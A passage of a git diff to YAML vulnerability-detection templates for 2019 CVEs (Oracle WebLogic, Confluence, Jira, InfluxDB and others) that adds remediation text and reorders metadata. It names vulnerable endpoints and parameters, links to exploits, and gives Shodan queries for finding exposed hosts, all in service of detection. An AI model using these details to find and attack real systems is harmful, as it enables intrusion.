a1f5bdc87b..2819373ab7 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software. reference: - https://www.exploit-db.com/exploits/48311 - https://www.exploit-db.com/exploits/47774 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.58096 - cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.97276 + cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tvt diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index e89a0a157f..d703003ba2 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -5,6 +5,8 @@ info: author: knassar702 severity: medium description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter. + remediation: | + Apply the latest security patch or update provided by the theme developer to fix the XSS vulnerability. reference: - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* epss-percentile: 0.46269 + cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: laborator product: neon + framework: wordpress tags: cve,cve2019,xss http: diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 41abdf4d20..fac2df72fe 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. + remediation: | + Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability. reference: - https://www.exploit-db.com/exploits/49596 - https://medium.com/@Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34 @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-20183 cwe-id: CWE-434 epss-score: 0.0192 - cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.87111 + cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: employee_records_system_project diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 415507c748..4524c6e47e 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. + remediation: | + Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/10013 - https://wpvulndb.com/vulnerabilities/10018 @@ -18,13 +20,13 @@ info: cve-id: CVE-2019-20210 cwe-id: CWE-79 epss-score: 0.00249 - cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* epss-percentile: 0.62023 + cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: cththemes product: citybook + framework: wordpress tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss http: diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index bf7aa62649..0ae86aa68e 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -6,21 +6,21 @@ info: severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 epss-score: 0.15573 - cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* epss-percentile: 0.95195 + cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* metadata: max-request: 2 vendor: artica diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 8d52a31491..b0f741ba55 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -5,27 +5,27 @@ info: author: pussycat0x,c-sh0 severity: critical description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933 - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 - remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 epss-score: 0.03713 - cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* epss-percentile: 0.90575 + cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: InfluxDB verified: true + max-request: 1 vendor: influxdata product: influxdb + shodan-query: InfluxDB tags: unauth,db,influxdb,misconfig http: diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index ee7c58b8fd..ca9fd6f2c0 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: high description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578). reference: - https://www.oracle.com/security-alerts/cpuapr2019.html - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites @@ -15,8 +17,8 @@ info: cvss-score: 8.6 cve-id: CVE-2019-2578 epss-score: 0.00815 - cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* epss-percentile: 0.79635 + cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index 602db3bc98..beaca84ef8 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner @@ -15,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2019-2579 epss-score: 0.00493 - cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* epss-percentile: 0.73168 + cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index fd0ab45e66..1f8ca48351 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability. reference: - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2588 @@ -14,8 +16,8 @@ info: cvss-score: 4.9 cve-id: CVE-2019-2588 epss-score: 0.10482 - cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* epss-percentile: 0.94259 + cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 5f2b354490..677d3d3e36 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html @@ -14,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2616 epss-score: 0.94746 - cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* epss-percentile: 0.98945 + cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index b29054a931..a001be2253 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability and ensure proper input validation and sanitization of XML data. reference: - https://paper.seebug.org/910/ - https://www.exploit-db.com/exploits/46780/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-2725 cwe-id: CWE-74 epss-score: 0.97571 - cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* epss-percentile: 0.99998 + cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 099f2c7c7d..da53d8eeb9 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: - https://www.oracle.com/security-alerts/alert-cve-2019-2729.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2729 @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-2729 cwe-id: CWE-284 epss-score: 0.97178 - cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* epss-percentile: 0.99717 + cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 94f3aee397..92af704750 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher. + remediation: | + Apply the latest security patches provided by Oracle to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html @@ -14,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.14972 - cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* epss-percentile: 0.95103 + cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index bcedb819b6..5d3cadfaaf 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: critical description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. + remediation: | + Apply the necessary security patches or upgrade to a patched version of Atlassian Confluence Server to mitigate this vulnerability. reference: - https://github.com/x-f1v3/CVE-2019-3396 - https://nvd.nist.gov/vuln/detail/CVE-2019-3396 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-3396 cwe-id: CWE-22 epss-score: 0.97498 - cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* epss-percentile: 0.9996 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: confluence + shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm http: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 9509ad1aca..2626c86602 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + remediation: | + Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: - https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution - https://nvd.nist.gov/vuln/detail/CVE-2019-3398 @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-3398 cwe-id: CWE-22 epss-score: 0.97342 - cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* epss-percentile: 0.99829 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 7da5ea6818..59dbfdc84c 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -5,23 +5,23 @@ info: author: TechbrunchFR,milo2012 severity: medium description: Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + remediation: Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. reference: - https://jira.atlassian.com/browse/JRASERVER-69244 - https://nvd.nist.gov/vuln/detail/CVE-2019-3401 - remediation: Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-3401 cwe-id: CWE-863 epss-score: 0.0055 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.74576 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,jira,atlassian,exposure http: @@ -42,4 +42,4 @@ http: # Turning the feature off will not affect existing filters and dashboards. # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index aa0b55b566..f6f653ee44 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter. + remediation: | + Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c - https://jira.atlassian.com/browse/JRASERVER-69243 @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.00238 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.61147 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.component:"Atlassian Jira" + max-request: 1 vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,atlassian,jira,xss http: diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index fe2eb6f1a5..9e44d8d3a8 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access. + remediation: | + Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place. reference: - https://jira.atlassian.com/browse/JRASERVER-69242 - https://nvd.nist.gov/vuln/detail/CVE-2019-3403 @@ -14,13 +16,13 @@ info: cve-id: CVE-2019-3403 cwe-id: CWE-863 epss-score: 0.00379 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.69498 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,atlassian,jira,enumeration http: diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 1a7390404c..30d168a8bb 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack. + remediation: | + Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-3799 cwe-id: CWE-22 epss-score: 0.0198 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* epss-percentile: 0.87311 + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index ceb7ef4a02..1540eb3410 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-03 - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 @@ -14,13 +16,13 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* epss-percentile: 0.56537 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 - shodan-query: 'Server: Labkey' vendor: labkey product: labkey_server + shodan-query: 'Server: Labkey' tags: cve,cve2019,xss,labkey,tenable http: diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index e372ee2ab6..b48df5eab6 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-03 - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 @@ -14,13 +16,13 @@ info: cve-id: CVE-2019-3912 cwe-id: CWE-601 epss-score: 0.0016 - cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* epss-percentile: 0.51912 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: 'Server: Labkey' vendor: labkey product: labkey_server + shodan-query: 'Server: Labkey' tags: tenable,cve,cve2019,redirect,labkey http: diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index b619a807e8..959857279c 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-3929 cwe-id: CWE-79,CWE-78 epss-score: 0.97438 - cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* epss-percentile: 0.99911 + cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: crestron diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 4fe6bb4194..678f521075 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 - https://nvd.nist.gov/vuln/detail/CVE-2019-5127 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-5127 cwe-id: CWE-78 epss-score: 0.97404 - cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* epss-percentile: 0.99879 + cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 vendor: youphptube diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index c044e22196..ca762267b4 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -5,6 +5,8 @@ info: author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. + remediation: | + Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-5418 epss-score: 0.97427 - cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* epss-percentile: 0.99897 + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index b591405d47..ee3364ce0f 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites. + remediation: | + Apply the latest security patches or upgrade to a newer version of Revive Adserver. reference: - https://packetstormsecurity.com/files/155559/Revive-Adserver-4.2-Remote-Code-Execution.html - https://www.exploit-db.com/exploits/47739 @@ -18,14 +20,14 @@ info: cve-id: CVE-2019-5434 cwe-id: CWE-502 epss-score: 0.28703 - cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* epss-percentile: 0.9626 + cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.favicon.hash:106844876 verified: true + max-request: 2 vendor: revive-sas product: 